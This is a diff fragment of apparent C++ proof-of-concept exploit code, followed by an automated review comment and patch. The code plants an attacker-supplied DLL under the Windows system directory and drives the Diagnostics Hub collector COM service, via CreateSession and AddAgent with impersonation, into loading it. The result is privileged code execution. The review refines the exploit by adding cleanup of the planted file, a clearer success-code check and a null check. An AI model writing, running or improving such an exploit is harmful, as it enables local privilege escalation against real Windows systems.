+ GetSystemDirectory(target, MAX_PATH);
+ StringCchCat(target, MAX_PATH, L"\\");
+ StringCchCat(target, MAX_PATH, random_name);
+
+ WCHAR valid_dir[MAX_PATH];
+ GetModuleFileName(nullptr, valid_dir, MAX_PATH);
+ WCHAR* p = wcsrchr(valid_dir, L'\\');
+ *p = 0;
+ StringCchCat(valid_dir, MAX_PATH,
L"\\etw");
+ CreateDirectory(valid_dir, nullptr);
+
+ if (!CopyFile(argv[1], target, FALSE))
+ {
+ printf("Error copying file %d\n", GetLastError());
+ return 1;
+ }
+
+ IStandardCollectorServicePtr service;
+ ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
+ DWORD authn_svc;
+ DWORD authz_svc;
+ LPOLESTR principal_name;
+ DWORD authn_level;
+ DWORD imp_level;
+ RPC_AUTH_IDENTITY_HANDLE identity;
+ DWORD capabilities;
+
+ ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
+ ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
+ SessionConfiguration config = {};
+ config.version = 1;
+ config.monitor_pid = ::GetCurrentProcessId();
+ CoCreateGuid(&config.guid);
+ bstr_t path = valid_dir;
+ config.path = path;
+ ICollectionSessionPtr session;
+
+ ThrowOnError(service->CreateSession(&config, nullptr, &session));
+ GUID agent_guid;
+ CoCreateGuid(&agent_guid);
+ ThrowOnError(session->AddAgent(random_name, agent_guid));
+ }
+ catch (const _com_error& error)
+ {
+ if (error.Error() == 0x8007045A)
+ {
+ printf("DLL should have been loaded\n");
+ }
+ else
+ {
+ printf("%ls\n", error.ErrorMessage());
+ printf("%08X\n", error.Error());
+ }
+ }
+
+ return 0;
+}
\ No newline at end of file
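Review bot: The planted DLL is never removed: `CopyFile(argv[1], target, FALSE)` writes it to `system32\tasks:<guid>.dll` and nothing deletes `target` on either the success path or the `_com_error` path, so every run of the PoC leaves an attacker-supplied DLL attached to a privileged system directory on the test machine. I would hold the stream path in a small scope-exit object declared right after the copy succeeds so it is deleted however the try block exits (DeleteFile accepts a stream path; whether the service has released its mapping by the time the destructor runs should be confirmed on the test box, since a failed agent initialisation normally unloads the module). The success test `error.Error() == 0x8007045A` would also read better as `HRESULT_FROM_WIN32(ERROR_DLL_INIT_FAILED)` with a comment that the dropped DLL is expected to fail agent initialisation after DllMain has run, and `*p = 0;` dereferences the `wcsrchr` result without a null check, `if (p) *p = 0;`. The `#include` arguments appear stripped in this rendering (`+#include` with no header), which looks like an extraction artifact rather than the committed source.
```cpp
// … unchanged: includes, COM interface declarations, CoInit, ThrowOnError …

// Deletes the stream planted in system32\tasks when the enclosing scope exits,
// whether AddAgent succeeds, throws, or nothing after the copy ran at all.
struct StreamCleanup
{
    const WCHAR* path;
    ~StreamCleanup() { if (path) DeleteFile(path); }
};

// … unchanged: wmain argument check, CoInit, name/target/valid_dir setup, CopyFile check …
        StreamCleanup cleanup{ target };   // declared right after the CopyFile succeeds
// … unchanged: CoCreateInstance, proxy blanket, CreateSession, AddAgent …
        // ERROR_DLL_INIT_FAILED: the service loaded our DLL (DllMain ran) but it is not a real agent.
        if (error.Error() == HRESULT_FROM_WIN32(ERROR_DLL_INIT_FAILED))
```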